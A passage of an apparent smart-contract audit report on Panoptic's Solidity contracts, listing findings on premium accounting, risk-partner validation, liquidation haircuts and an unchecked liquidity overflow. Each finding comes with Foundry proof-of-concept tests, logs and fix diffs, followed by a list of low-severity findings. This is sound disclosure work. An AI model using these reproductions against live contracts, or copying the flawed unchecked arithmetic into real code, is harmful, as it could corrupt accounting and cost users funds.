uint256[2][4] memory _premiumAccumulatorsByLeg = premiumAccumulatorsByLeg;
uint256 _leg = leg;
// if there's still liquidity, compute the new grossPremiumLast
// otherwise, we just reset grossPremiumLast to the current grossPremium
@> s_grossPremiumLast[chunkKey] = totalLiquidity != 0
? LeftRightUnsigned
.wrap(0)
.toRightSlot(
uint128(
uint256(
Math.max(
(int256(
grossPremiumLast.rightSlot() *
totalLiquidityBefore
) -
int256(
_premiumAccumulatorsByLeg[_leg][0] *
positionLiquidity
)) + int256(legPremia.rightSlot() * 2 ** 64),
0
)
) / totalLiquidity
)
)
.toLeftSlot(
uint128(
uint256(
Math.max(
(int256(
grossPremiumLast.leftSlot() *
totalLiquidityBefore
) -
int256(
_premiumAccumulatorsByLeg[_leg][1] *
positionLiquidity
)) + int256(legPremia.leftSlot()) * 2 ** 64,
0
)
) / totalLiquidity
)
)
: LeftRightUnsigned
.wrap(0)
.toRightSlot(uint128(premiumAccumulatorsByLeg[_leg][0]))
.toLeftSlot(uint128(premiumAccumulatorsByLeg[_leg][1]));
}
}
}
// update settled tokens in storage with all local deltas
s_settledTokens[chunkKey] = settledTokens;
unchecked {
++leg;
}
The issue lies within _updateSettlementPostBurn()
, where it adds a condition that if (LeftRightSigned.unwrap(legPremia) != 0)
must be met for s_grossPremiumLast[chunkKey]
to decrease.
This results in not recalculating s_grossPremiumLast[chunkKey]
even when totalLiquidity
changes.
For example, in the same block, if a user executes mintOptions()
, s_grossPremiumLast[chunkKey]
increases by 50. Immediately after, executing burnOptions()
doesn't decrease s_grossPremiumLast[chunkKey]
by 50 because legPremia == 0
.
The following code demonstrates this scenario, where s_grossPremiumLast[chunkKey]
keeps increasing, so last gross accumulated
keeps decreasing.
- Add to
Misc.t.sol
function test_burn_not_reduce_last() public {
swapperc = new SwapperC();
vm.startPrank(Swapper);
token0.mint(Swapper, type(uint128).max);
token1.mint(Swapper, type(uint128).max);
token0.approve(address(swapperc), type(uint128).max);
token1.approve(address(swapperc), type(uint128).max);
// mint OTM position
$posIdList.push(
TokenId.wrap(0).addPoolId(PanopticMath.getPoolId(address(uniPool))).addLeg(
0,
1,
1,
0,
0,
0,
15,
1
)
);
//@info Bob same gross
vm.startPrank(Bob);
pp.mintOptions($posIdList, 1_000_000, 0, 0, 0);
vm.startPrank(Swapper);
swapperc.swapTo(uniPool, Math.getSqrtRatioAtTick(10) + 1);
// 1998600539
accruePoolFeesInRange(address(uniPool), (uniPool.liquidity() * 2) / 3, 1, 1);
swapperc.swapTo(uniPool, 2 ** 96);
//@info end of Bob same gross
//@info start alice , it should without change gross
console.log("*****start alice mint/burn should not reduce last accumulated");
for(uint256 i=0;i<10;i++){
vm.startPrank(Alice);
pp.mintOptions($posIdList, 250_000, type(uint64).max, 0, 0);
vm.startPrank(Alice);
pp.burnOptions($posIdList[0], new TokenId[](0), 0, 0);
}
}
- Add to
PanopticPool.sol
function _updateSettlementPostMint(
TokenId tokenId,
LeftRightUnsigned[4] memory collectedByLeg,
uint128 positionSize
) internal {
...
unchecked {
// L
LeftRightUnsigned grossPremiumLast = s_grossPremiumLast[chunkKey];
// R
uint256 positionLiquidity = liquidityChunk.liquidity();
// T (totalLiquidity is (T + R) after minting)
uint256 totalLiquidityBefore = totalLiquidity - positionLiquidity;
//console.log("s_grossPremiumLast[chunkKey].rightSlot() from:",s_grossPremiumLast[chunkKey].rightSlot());
s_grossPremiumLast[chunkKey] = LeftRightUnsigned
.wrap(0)
.toRightSlot(
uint128(
(grossCurrent[0] *
positionLiquidity +
grossPremiumLast.rightSlot() *
totalLiquidityBefore) / (totalLiquidity)
)
)
.toLeftSlot(
uint128(
(grossCurrent[1] *
positionLiquidity +
grossPremiumLast.leftSlot() *
totalLiquidityBefore) / (totalLiquidity)
)
);
+ console.log("last accumulated : ",(grossCurrent[0] - s_grossPremiumLast[chunkKey].rightSlot()) * totalLiquidity);
}
}
}
}
$ forge test -vvv --match-test test_burn_not_reduce_last
[PASS] test_burn_not_reduce_last() (gas: 5276055)
Logs:
last accumulated : 0
*****start alice mint/burn should not reduce last accumulated
last accumulated : 36893488148466911062
last accumulated : 29514790528266881407
last accumulated : 23611832432106857683
last accumulated : 18889465953679888300
last accumulated : 15111572767940411986
last accumulated : 12089258220348131204
last accumulated : 9671406580275706040
last accumulated : 7737125266718815505
last accumulated : 6189700215873303077
last accumulated : 4951760174697243000
Due to the incorrect accounting of s_grossPremiumLast[chunkKey]
, the calculation in _getAvailablePremium()
is also incorrect. This results in inaccuracies in the amount of premium received by the seller when closing their position.
Regardless of the value of legPremia
, it should recalculate s_grossPremiumLast[chunkKey]
when long == 0
.
function _updateSettlementPostBurn(
address owner,
TokenId tokenId,
LeftRightUnsigned[4] memory collectedByLeg,
uint128 positionSize,
bool commitLongSettled
) internal returns (LeftRightSigned realizedPremia, LeftRightSigned[4] memory premiaByLeg) {
...
for (uint256 leg = 0; leg < numLegs; ) {
LeftRightSigned legPremia = premiaByLeg[leg];
bytes32 chunkKey = keccak256(
abi.encodePacked(tokenId.strike(leg), tokenId.width(leg), tokenId.tokenType(leg))
);
// collected from Uniswap
LeftRightUnsigned settledTokens = s_settledTokens[chunkKey].add(collectedByLeg[leg]);
if (LeftRightSigned.unwrap(legPremia) != 0) {
// (will be) paid by long legs
if (tokenId.isLong(leg) == 1) {
...
} else {
....
// subtract settled tokens sent to seller
settledTokens = settledTokens.sub(availablePremium);
// add available premium to amount that should be settled
realizedPremia = realizedPremia.add(
LeftRightSigned.wrap(int256(LeftRightUnsigned.unwrap(availablePremium)))
);
- unchecked {
- uint256[2][4] memory _premiumAccumulatorsByLeg = premiumAccumulatorsByLeg;-
- uint256 _leg = leg;
-
- // if there's still liquidity, compute the new grossPremiumLast
- // otherwise, we just reset grossPremiumLast to the current grossPremium
- s_grossPremiumLast[chunkKey] = totalLiquidity != 0
- ? LeftRightUnsigned
- .wrap(0)
- .toRightSlot(
- uint128(
- uint256(
- Math.max(
- (int256(
- grossPremiumLast.rightSlot() *
- totalLiquidityBefore
- ) -
- int256(
- _premiumAccumulatorsByLeg[_leg][0] *
- positionLiquidity
- )) + int256(legPremia.rightSlot() * 2 ** 64),
- 0
- )
- ) / totalLiquidity
- )
- )
- .toLeftSlot(
- uint128(
- uint256(
- Math.max(
- (int256(
- grossPremiumLast.leftSlot() *
- totalLiquidityBefore
- ) -
- int256(
- _premiumAccumulatorsByLeg[_leg][1] *
- positionLiquidity
- )) + int256(legPremia.leftSlot()) * 2 ** 64,
- 0
- )
- ) / totalLiquidity
- )
- )
- : LeftRightUnsigned
- .wrap(0)
- .toRightSlot(uint128(premiumAccumulatorsByLeg[_leg][0]))
- .toLeftSlot(uint128(premiumAccumulatorsByLeg[_leg][1]));
- }
}
}
+ if (tokenId.isLong(leg) == 0){
+ uint256 positionLiquidity = PanopticMath
+ .getLiquidityChunk(tokenId, leg, positionSize)
+ .liquidity();
+
+ // new totalLiquidity (total sold) = removedLiquidity + netLiquidity (T - R)
+ uint256 totalLiquidity = _getTotalLiquidity(tokenId, leg);
+ // T (totalLiquidity is (T - R) after burning)
+ uint256 totalLiquidityBefore = totalLiquidity + positionLiquidity;
+
+ LeftRightUnsigned grossPremiumLast = s_grossPremiumLast[chunkKey];
+ unchecked {
+ uint256[2][4] memory _premiumAccumulatorsByLeg = premiumAccumulatorsByLeg;
+ uint256 _leg = leg;
+
+ // if there's still liquidity, compute the new grossPremiumLast
+ // otherwise, we just reset grossPremiumLast to the current grossPremium
+ s_grossPremiumLast[chunkKey] = totalLiquidity != 0
+ ? LeftRightUnsigned
+ .wrap(0)
+ .toRightSlot(
+ uint128(
+ uint256(
+ Math.max(
+ (int256(
+ grossPremiumLast.rightSlot() *
+ totalLiquidityBefore
+ ) -
+ int256(
+ _premiumAccumulatorsByLeg[_leg][0] *
+ positionLiquidity
+ )) + int256(legPremia.rightSlot() * 2 ** 64),
+ 0
+ )
+ ) / totalLiquidity
+ )
+ )
+ .toLeftSlot(
+ uint128(
+ uint256(
+ Math.max(
+ (int256(
+ grossPremiumLast.leftSlot() *
+ totalLiquidityBefore
+ ) -
+ int256(
+ _premiumAccumulatorsByLeg[_leg][1] *
+ positionLiquidity
+ )) + int256(legPremia.leftSlot()) * 2 ** 64,
+ 0
+ )
+ ) / totalLiquidity
+ )
+ )
+ : LeftRightUnsigned
+ .wrap(0)
+ .toRightSlot(uint128(premiumAccumulatorsByLeg[_leg][0]))
+ .toLeftSlot(uint128(premiumAccumulatorsByLeg[_leg][1]));
+ }
+ }
}
// update settled tokens in storage with all local deltas
s_settledTokens[chunkKey] = settledTokens;
unchecked {
++leg;
}
}
}
}
Context
[M-07] When Burning a Tokenized Position validate
should be done before flipping the isLong
bits in _validateAndForwardToAMM()
Submitted by 0xdice91
Each leg in a tokenid
has a risk partner which is usually its own index but in some cases, it could be another leg (Partner in defined risk position).
In the function validate()
if the risk partner of a specific leg is not
its own index then some additional checks are done to ensure that they are compatible like:
- Ensuring that risk partners are mutual
- Ensures that risk partners have the same asset.
- Ensures that risk partners have the same ratio.
- Plus other checks that depend on the legs
isLong
value compared to that of its risk partner.
function validate(TokenId self) internal pure {
if (self.optionRatio(0) == 0) revert Errors.InvalidTokenIdParameter(1);
// More Code...
// In the following, we check whether the risk partner of this leg is itself
// or another leg in this position.
// Handles case where riskPartner(i) != i ==> leg i has a risk partner that is another leg
uint256 riskPartnerIndex = self.riskPartner(i);
if (riskPartnerIndex != i) {
// Ensures that risk partners are mutual
if (self.riskPartner(riskPartnerIndex) != i)
revert Errors.InvalidTokenIdParameter(3);
// Ensures that risk partners have 1) the same asset, and 2) the same ratio
if (
(self.asset(riskPartnerIndex) != self.asset(i)) ||
(self.optionRatio(riskPartnerIndex) != self.optionRatio(i))
) revert Errors.InvalidTokenIdParameter(3);
// long/short status of associated legs
uint256 _isLong = self.isLong(i);
uint256 isLongP = self.isLong(riskPartnerIndex);
// token type status of associated legs (call/put)
uint256 _tokenType = self.tokenType(i);
uint256 tokenTypeP = self.tokenType(riskPartnerIndex);
// if the position is the same i.e both long calls, short put's etc.
// then this is a regular position, not a defined risk position
if ((_isLong == isLongP) && (_tokenType == tokenTypeP))
revert Errors.InvalidTokenIdParameter(4);
// if the two token long-types and the tokenTypes are both different (one is a short call, the other a long put, e.g.), this is a synthetic position
// A synthetic long or short is more capital efficient than each leg separated because the long+short premia accumulate proportionally
// unlike short stranlges, long strangles also cannot be partnered, because there is no reduction in risk (both legs can earn premia simultaneously)
if (((_isLong != isLongP) || _isLong == 1) && (_tokenType != tokenTypeP))
revert Errors.InvalidTokenIdParameter(5);
}
} // end for loop over legs
}
}
In burnTokenizedPosition()
the internal function _validateAndForwardToAMM()
is called, this function calls Tokenid.flipToBurnToken() which simply flips
the isLong bits of all active legs of the tokenid. Then validate()
is called which validates a position tokenId and its legs.
/// @param tokenId the option position
/// @param positionSize the size of the position to create
/// @param tickLimitLow lower limits on potential slippage
/// @param tickLimitHigh upper limits on potential slippage
/// @param isBurn is equal to false for mints and true for burns
/// @return collectedByLeg An array of LeftRight encoded words containing the amount of token0 and token1 collected as fees for each leg
/// @return totalMoved the total amount of funds swapped in Uniswap as part of building potential ITM positions
function _validateAndForwardToAMM(
TokenId tokenId,
uint128 positionSize,
int24 tickLimitLow,
int24 tickLimitHigh,
bool isBurn
) internal returns (LeftRightUnsigned[4] memory collectedByLeg, LeftRightSigned totalMoved) {
// Reverts if positionSize is 0 and user did not own the position before minting/burning
if (positionSize == 0) revert Errors.OptionsBalanceZero();
/// @dev the flipToBurnToken() function flips the isLong bits
if (isBurn) {
tokenId = tokenId.flipToBurnToken();
}
// Validate tokenId
tokenId.validate();
// Extract univ3pool from the poolId map to Uniswap Pool
IUniswapV3Pool univ3pool = s_poolContext[tokenId.poolId()].pool;
// Revert if the pool not been previously initialized
if (univ3pool == IUniswapV3Pool(address(0))) revert Errors.UniswapPoolNotInitialized();
// More Code...
}
The issue here is that if a leg in the tokenid has its risk partner
as another leg (that is, it is not its own risk partner), then flipping the isLong
bits may cause one of the checks
in validate()
to fail and revert as the isLong
bits of its risk partner are not
changed as well.
Remember that flipping changes the value of the bit from what it was to an opposite value (from 0 to 1 or from 1 to 0).
For example;
Let's say a leg with a different risk partner has isLong()
values that are the same but their tokenType()
is different, this would easily pass these checks below from validate()
but after a flip is done to its isLong
bits using flipToBurnToken() it will fail and revert in the second check below.
// if the position is the same i.e both long calls, short put's etc.
// then this is a regular position, not a defined risk position
if ((_isLong == isLongP) && (_tokenType == tokenTypeP))
revert Errors.InvalidTokenIdParameter(4);
// if the two token long-types and the tokenTypes are both different (one is a short call, the other a long put, e.g.), this is a synthetic position
// A synthetic long or short is more capital efficient than each leg separated because the long+short premia accumulate proportionally
// unlike short stranlges, long strangles also cannot be partnered, because there is no reduction in risk (both legs can earn premia simultaneously)
if (((_isLong != isLongP) || _isLong == 1) && (_tokenType != tokenTypeP))
revert Errors.InvalidTokenIdParameter(5);
This will result in a continuous revert of the function leading to an inability to Burn a Tokenized Position.
This whole issue results from the simple fact the risk partners, if different, are not flipped as well. I recommend validating the tokenid
before flipping the isLong
bits, to ensure any changes caused by flipping will not affect the execution of the function.
/// @param tokenId the option position
/// @param positionSize the size of the position to create
/// @param tickLimitLow lower limits on potential slippage
/// @param tickLimitHigh upper limits on potential slippage
/// @param isBurn is equal to false for mints and true for burns
/// @return collectedByLeg An array of LeftRight encoded words containing the amount of token0 and token1 collected as fees for each leg
/// @return totalMoved the total amount of funds swapped in Uniswap as part of building potential ITM positions
function _validateAndForwardToAMM(
TokenId tokenId,
uint128 positionSize,
int24 tickLimitLow,
int24 tickLimitHigh,
bool isBurn
) internal returns (LeftRightUnsigned[4] memory collectedByLeg, LeftRightSigned totalMoved) {
// Reverts if positionSize is 0 and user did not own the position before minting/burning
if (positionSize == 0) revert Errors.OptionsBalanceZero();
++ // Validate tokenId
++ tokenId.validate();
/// @dev the flipToBurnToken() function flips the isLong bits
if (isBurn) {
tokenId = tokenId.flipToBurnToken();
}
// Extract univ3pool from the poolId map to Uniswap Pool
IUniswapV3Pool univ3pool = s_poolContext[tokenId.poolId()].pool;
// Revert if the pool not been previously initialized
if (univ3pool == IUniswapV3Pool(address(0))) revert Errors.UniswapPoolNotInitialized();
// More Code...
}
Keeping Medium severity under "functionality is broken".
Submitted by Aymen0909, also found by FastChecker, 0xStalin, and DanielArmstrong
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/PanopticPool.sol#L1122-L1131
When the user positions are getting liquidated, the PanopticPool::liquidate
function will invoke under the hood the PanopticMath::haircutPremia
function which will use the user's long premium to cover the protocol losses.
The PanopticMath::haircutPremia
function will also update the storage mapping settledTokens
which represent the per-chunk accumulator for tokens owed to options sellers.
The issue that it's present in the PanopticMath::haircutPremia
function is when it runs the for-loop to update settledTokens
for each position leg chunk, inside the loop the function uses always the index 0
when calculating the leg chunkKey
instead of using the actual leg index leg
(which can be 0,1,2,3), this shown in the code snippet below:
function haircutPremia(
address liquidatee,
TokenId[] memory positionIdList,
LeftRightSigned[4][] memory premiasByLeg,
LeftRightSigned collateralRemaining,
CollateralTracker collateral0,
CollateralTracker collateral1,
uint160 sqrtPriceX96Final,
mapping(bytes32 chunkKey => LeftRightUnsigned settledTokens) storage settledTokens
) external returns (int256, int256) {
...
for (uint256 i = 0; i < positionIdList.length; i++) {
TokenId tokenId = positionIdList[i];
LeftRightSigned[4][] memory _premiasByLeg = premiasByLeg;
for (uint256 leg = 0; leg < tokenId.countLegs(); ++leg) {
if (tokenId.isLong(leg) == 1) {
mapping(bytes32 chunkKey => LeftRightUnsigned settledTokens)
storage _settledTokens = settledTokens;
// calculate amounts to revoke from settled and subtract from haircut req
uint256 settled0 = Math.unsafeDivRoundingUp(
uint128(-_premiasByLeg[i][leg].rightSlot()) * uint256(haircut0),
uint128(longPremium.rightSlot())
);
uint256 settled1 = Math.unsafeDivRoundingUp(
uint128(-_premiasByLeg[i][leg].leftSlot()) * uint256(haircut1),
uint128(longPremium.leftSlot())
);
//@audit always calculating the chunkKey of leg 0
bytes32 chunkKey = keccak256(
abi.encodePacked(
tokenId.strike(0),
tokenId.width(0),
tokenId.tokenType(0)
)
);
// The long premium is not commited to storage during the liquidation, so we add the entire adjusted amount
// for the haircut directly to the accumulator
settled0 = Math.max(
0,
uint128(-_premiasByLeg[i][leg].rightSlot()) - settled0
);
settled1 = Math.max(
0,
uint128(-_premiasByLeg[i][leg].leftSlot()) - settled1
);
_settledTokens[chunkKey] = _settledTokens[chunkKey].add(
LeftRightUnsigned.wrap(0).toRightSlot(uint128(settled0)).toLeftSlot(
uint128(settled1)
)
);
}
}
}
return (collateralDelta0, collateralDelta1);
}
This issue means that the settledTokens
accumulator will be updated incorrectly and will not include all the legs premium, as for each position only the first leg (index=0) is considered, this will result in funds losses for the options sellers and for the protocol.
Wrong leg chunkKey
calculation in haircutPremia
will cause incorrect update of settledTokens
accumulator and will result in funds losses for the options sellers and for the protocol.
VS Code
Use the correct leg index when calculating the leg chunkKey
in haircutPremia
function, the correct code should be:
function haircutPremia(
address liquidatee,
TokenId[] memory positionIdList,
LeftRightSigned[4][] memory premiasByLeg,
LeftRightSigned collateralRemaining,
CollateralTracker collateral0,
CollateralTracker collateral1,
uint160 sqrtPriceX96Final,
mapping(bytes32 chunkKey => LeftRightUnsigned settledTokens) storage settledTokens
) external returns (int256, int256) {
...
for (uint256 i = 0; i < positionIdList.length; i++) {
TokenId tokenId = positionIdList[i];
LeftRightSigned[4][] memory _premiasByLeg = premiasByLeg;
for (uint256 leg = 0; leg < tokenId.countLegs(); ++leg) {
if (tokenId.isLong(leg) == 1) {
mapping(bytes32 chunkKey => LeftRightUnsigned settledTokens)
storage _settledTokens = settledTokens;
// calculate amounts to revoke from settled and subtract from haircut req
uint256 settled0 = Math.unsafeDivRoundingUp(
uint128(-_premiasByLeg[i][leg].rightSlot()) * uint256(haircut0),
uint128(longPremium.rightSlot())
);
uint256 settled1 = Math.unsafeDivRoundingUp(
uint128(-_premiasByLeg[i][leg].leftSlot()) * uint256(haircut1),
uint128(longPremium.leftSlot())
);
bytes32 chunkKey = keccak256(
abi.encodePacked(
-- tokenId.strike(0),
-- tokenId.width(0),
-- tokenId.tokenType(0)
++ tokenId.strike(leg),
++ tokenId.width(leg),
++ tokenId.tokenType(leg)
)
);
// The long premium is not commited to storage during the liquidation, so we add the entire adjusted amount
// for the haircut directly to the accumulator
settled0 = Math.max(
0,
uint128(-_premiasByLeg[i][leg].rightSlot()) - settled0
);
settled1 = Math.max(
0,
uint128(-_premiasByLeg[i][leg].leftSlot()) - settled1
);
_settledTokens[chunkKey] = _settledTokens[chunkKey].add(
LeftRightUnsigned.wrap(0).toRightSlot(uint128(settled0)).toLeftSlot(
uint128(settled1)
)
);
}
}
}
return (collateralDelta0, collateralDelta1);
}
Context
dyedm1 (Panoptic) confirmed and commented:
I will confirm this because we are fixing it, but I don't think high severity is justified here. The only impact is that during liquidations, premium paid by the liquidatee for legs other than 0 is effectively haircut/refunded to the liquidatee, which could result in an uneven distribution of the haircut and some premium that could have been safely paid being refunded to the liquidatee. Besides resulting in unfair distribution at liquidation time for sellers in the 2-3-4 chunks, no actor in the protocol actually loses funds (yield for sellers is not realized until it is settled anyway, so if they closed before the liquidation occurred they would get the exact same payment).
Picodes (judge) decreased severity to Medium and commented:
Giving Medium severity as this only concerns unrealized yield and happens during liquidations only.
[M-09] Removed liquidity can overflow when calling SemiFungiblePositionManager.mintTokenizedPosition
function
Submitted by rbserver
The following mintTokenizedPosition
function eventually calls the _createLegInAMM
function below.
function mintTokenizedPosition(
TokenId tokenId,
uint128 positionSize,
int24 slippageTickLimitLow,
int24 slippageTickLimitHigh
)
external
ReentrancyLock(tokenId.poolId())
returns (LeftRightUnsigned[4] memory collectedByLeg, LeftRightSigned totalSwapped)
{
// create the option position via its ID in this erc1155
_mint(msg.sender, TokenId.unwrap(tokenId), positionSize);
...
// validate the incoming option position, then forward to the AMM for minting/burning required liquidity chunks
(collectedByLeg, totalSwapped) = _validateAndForwardToAMM(
tokenId,
positionSize,
slippageTickLimitLow,
slippageTickLimitHigh,
MINT
);
}
The _createLegInAMM
function increases the removed liquidity when minting a long position by executing unchecked { removedLiquidity += chunkLiquidity }
in which the related code comment states that we can't remove more liquidity than we add in the first place, so this can't overflow
. However, minting contracts of the short and long positions repeatedly can actually increase the removed liquidity to overflow uint128
, which means that the unchecked
block is unsafe. When such overflow occurs, the accounting for the removed liquidity and liquidity becomes incorrect; in this case, the overflowed removed liquidity becomes less than it should be, and burning such overflowed removed liquidity would increase the liquidity by an amount that is less than it should be.
function _createLegInAMM(
IUniswapV3Pool univ3pool,
TokenId tokenId,
uint256 leg,
LiquidityChunk liquidityChunk,
bool isBurn
)
internal
returns (
LeftRightSigned moved,
LeftRightSigned itmAmounts,
LeftRightUnsigned collectedSingleLeg
)
{
...
uint128 updatedLiquidity;
uint256 isLong = tokenId.isLong(leg);
LeftRightUnsigned currentLiquidity = s_accountLiquidity[positionKey]; //cache
{
...
uint128 startingLiquidity = currentLiquidity.rightSlot();
uint128 removedLiquidity = currentLiquidity.leftSlot();
uint128 chunkLiquidity = liquidityChunk.liquidity();
if (isLong == 0) {
// selling/short: so move from msg.sender *to* uniswap
// we're minting more liquidity in uniswap: so add the incoming liquidity chunk to the existing liquidity chunk
updatedLiquidity = startingLiquidity + chunkLiquidity;
/// @dev If the isLong flag is 0=short but the position was burnt, then this is closing a long position
/// @dev so the amount of removed liquidity should decrease.
if (isBurn) {
removedLiquidity -= chunkLiquidity;
}
} else {
// the _leg is long (buying: moving *from* uniswap to msg.sender)
// so we seek to move the incoming liquidity chunk *out* of uniswap - but was there sufficient liquidity sitting in uniswap
// in the first place?
if (startingLiquidity < chunkLiquidity) {
// the amount we want to move (liquidityChunk.legLiquidity()) out of uniswap is greater than
// what the account that owns the liquidity in uniswap has (startingLiquidity)
// we must ensure that an account can only move its own liquidity out of uniswap
// so we revert in this case
revert Errors.NotEnoughLiquidity();
} else {
// startingLiquidity is >= chunkLiquidity, so no possible underflow
unchecked {
// we want to move less than what already sits in uniswap, no problem:
updatedLiquidity = startingLiquidity - chunkLiquidity;
}
}
/// @dev If the isLong flag is 1=long and the position is minted, then this is opening a long position
/// @dev so the amount of removed liquidity should increase.
if (!isBurn) {
// we can't remove more liquidity than we add in the first place, so this can't overflow
unchecked {
removedLiquidity += chunkLiquidity;
}
}
}
// update the starting liquidity for this position for next time around
s_accountLiquidity[positionKey] = LeftRightUnsigned
.wrap(0)
.toLeftSlot(removedLiquidity)
.toRightSlot(updatedLiquidity);
}
...
}
Please add the following test in test\foundry\core\SemiFungiblePositionManager.t.sol
. This test will pass to demonstrate the described scenario.
function test_removedLiquidityOverflow() public {
_initPool(0);
_cacheWorldState(USDC_WETH_30);
sfpm.initializeAMMPool(token0, token1, fee);
int24 width = 4090;
int24 strike = 0;
populatePositionData(width, strike, 0, 0);
uint128 psnSize = type(uint128).max / 70;
TokenId shortTokenId = TokenId.wrap(0).addPoolId(poolId).addLeg(
0,
1,
isWETH,
0,
0,
0,
strike,
width
);
TokenId longTokenId = TokenId.wrap(0).addPoolId(poolId).addLeg(
0,
1,
isWETH,
1,
0,
0,
strike,
width
);
// repeatedly mint contracts of the short and long positions
for (uint256 i = 0; i < 32311; i++) {
sfpm.mintTokenizedPosition(
shortTokenId,
psnSize,
TickMath.MIN_TICK,
TickMath.MAX_TICK
);
sfpm.mintTokenizedPosition(
longTokenId,
psnSize,
TickMath.MIN_TICK,
TickMath.MAX_TICK
);
}
accountLiquidities = sfpm.getAccountLiquidity(
address(USDC_WETH_30),
Alice,
0,
tickLower,
tickUpper
);
// at this moment, the removed liquidity does not overflow uint128 yet
uint128 accountLiquidities_leftSlot_before_overflow = accountLiquidities.leftSlot();
assertLt(accountLiquidities_leftSlot_before_overflow, type(uint128).max);
// mint contracts of the short and long positions for one more time
sfpm.mintTokenizedPosition(
shortTokenId,
psnSize,
TickMath.MIN_TICK,
TickMath.MAX_TICK
);
sfpm.mintTokenizedPosition(
longTokenId,
psnSize,
TickMath.MIN_TICK,
TickMath.MAX_TICK
);
accountLiquidities = sfpm.getAccountLiquidity(
address(USDC_WETH_30),
Alice,
0,
tickLower,
tickUpper
);
// the removed liquidity has overflowed uint128 since it is now less than its previous value
assertLt(accountLiquidities.leftSlot(), accountLiquidities_leftSlot_before_overflow);
}
SemiFungiblePositionManager.sol#L1029-L1034 can be updated to the following code:
if (!isBurn) {
removedLiquidity += chunkLiquidity;
}
Under/Overflow
For this audit, 43 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by DadeKuma received the top score from the judge.
The following wardens also submitted reports: 99Crits, favelanky, cheatc0d3, slvDev, bareli, Rolezn, hihen, Dup1337, Bauchibred, 0xStalin, ZanyBonzy, albahaca, radin100, Naresh, grearlake, rbserver, d3e4, zabihullahazadzoi, Aymen0909, John_Femi, lanrebayode77, KupiaSec, jasonxiale, satoshispeedrunner, CodeWasp, sammy, pfapostol, Rhaydden, blockchainbuttonmasher, jesjupyter, mining_mario, twcctop, 0xhacksmithh, K42, Topmark, lsaudit, lirezArAzAvi, crc32, codeslide, oualidpro, Sathish9098, and IllIllI.
The median calculation is wrong, it always assumes an odd length, but the math is different if the length is even.
In that case, it should be:
return int24((sortedTicks[9] + sortedTicks[10]) / 2);
There is 1 instance of this issue.
File: contracts/libraries/PanopticMath.sol
266: return int24(sortedTicks[10]);
[266]
Some tokens such as COMP downcast such approvals to uint96 and use that as a raw value rather than interpreting it as an infinite approval. Eventually these approvals will reach zero, at which point the calling contract will no longer function properly.
There are 4 instances of this issue. (For in-depth details on this and all further low and non-critical items with multiple instances, see the warden's full report.)
Infinite approvals on external contracts can be dangerous if the target becomes compromised. See here for a list of approval exploits. The following contracts are vulnerable to such attacks since they have no functionality to revoke the approval (call approve
with amount 0
). Consider enabling the contract to revoke approval in emergency situations.
There are 4 instances of this issue.
In solidity versions prior to 0.8.21, there is a legacy code generation bug where if foo().selector
is called, foo()
doesn't actually get evaluated. It is listed as low-severity, because projects usually use the contract name rather than a function call to look up the selector.
There are 3 instances of this issue.
The project contracts in scope are using low level calls with solidity version before 0.8.14 which can result in an optimizer bug.
This bug causes the optimizer to consider some memory operations in inline assembly as being 'dead' and remove them.
Later operations that would read the values written by these improperly removed memory operations will instead observe the old version of memory.
There are 30 instances of this issue.
This bug was introduced in Solidity version 0.8.13, and it was fixed in version 0.8.17. This bug is significantly easier to trigger with optimized via-IR code generation, but can theoretically also occur in optimized legacy code generation. More info can be read in this post.
There are 30 instances of this issue.
Even if the function follows the best practice of check-effects-interaction, not using a reentrancy guard when there may be transfer hooks will open the users of this protocol up to read-only reentrancies with no way to protect against it, except by block-listing the whole protocol.
There are 2 instances of this issue.
Not all IERC20
implementations are totally compliant, and some (e.g UNI
, COMP
) may fail if the valued passed to approve
is larger than uint96
. If the approval amount is type(uint256).max
, which may cause issues with systems that expect the value passed to approve to be reflected in the allowances mapping.
There are 4 instances of this issue.
Initializers could be front-run, allowing an attacker to either set their own values, take ownership of the contract, and in the best case forcing a re-deployment.
There are 2 instances of this issue.
If the length of the arrays are not required to be of the same length, user operations may not be fully executed.
There are 4 instances of this issue.
These functions can be called with 0 value in the input and this value is not checked for being bigger than 0, that means in some scenarios this can potentially trigger a division by zero.
There are 2 instances of this issue.
Consider limiting the number of iterations in loops that make external calls, as just a single one of them failing will result in a revert.
There are 22 instances of this issue.
In Solidity 0.8.20
's compiler, the default target EVM version has been changed to Shanghai. This version introduces a new op code called PUSH0
.
However, not all Layer 2 solutions have implemented this op code yet, leading to deployment failures on these chains. To overcome this problem, it is recommended to utilize an earlier EVM version.
There are 20 instances of this issue.
abi.encodePacked
should not be used with dynamic types when passing the result to a hash function such as keccak256
. Use abi.encode
instead, which will pad items to 32 bytes, to prevent any hash collisions.
There are 9 instances of this issue.
Changing an allowance with approve
brings the risk that someone may use both the old and the new allowance by unfortunate transaction ordering. Refer to ERC20 API: An Attack Vector on the Approve/TransferFrom Methods.
It is recommended to use the increaseAllowance/decreaseAllowance
to avoid ths problem.
There are 4 instances of this issue.
Custom errors are available from solidity version 0.8.4. Custom errors are more easily processed in try-catch blocks, and are easier to re-use and maintain.
There are 9 instances of this issue.
It is good to add a require
statement that checks the return value of token transfers, or to use something like OpenZeppelin's safeTransfer
/safeTransferFrom
, even if one is sure that the given token reverts in case of a failure.
This reduces the risk to zero even if these contracts are upgreadable, and it also helps with security reviews, as the auditor will not have to check this specific edge case.
There are 2 instances of this issue.
Consider breaking down these blocks into more manageable units, by splitting things into utility functions, by reducing nesting, and by using early returns.
There are 33 instances of this issue.
Events should be emitted when sensitive changes are made to the contracts, but some functions lack them.
There are 8 instances of this issue.
As a best practice, consider emitting an event when the contract is initialized. In this way, it's easy for the user to track the exact point in time when the contract was initialized, by filtering the emitted events.
There is 1 instance of this issue.
File: contracts/PanopticFactory.sol
135: function initialize(address _owner) public {
[135]
This will allow users to easily exactly pinpoint when and by whom a contract was constructed.
There are 4 instances of this issue.
Not only is wasteful in terms of gas, but this is especially problematic when an event is emitted and the old and new values set are the same, as listeners might not expect this kind of scenario.
There are 6 instances of this issue.
Taking zero as a valid argument without checks can lead to severe security issues in some cases.
If using a zero argument is mandatory, consider using descriptive constants or an enum instead of passing zero directly on function calls, as that might be error-prone, to fully describe the caller's intention.
There are 63 instances of this issue.
Declaring named returns, but not using them, is confusing to the reader. Consider either completely removing them (by declaring just the type without a name), or remove the return statement and do a variable assignment.
This would improve the readability of the code, and it may also help reduce regressions during future code refactors.
There are 20 instances of this issue.
The following errors are never used, consider to remove them.
There are 2 instances of this issue.
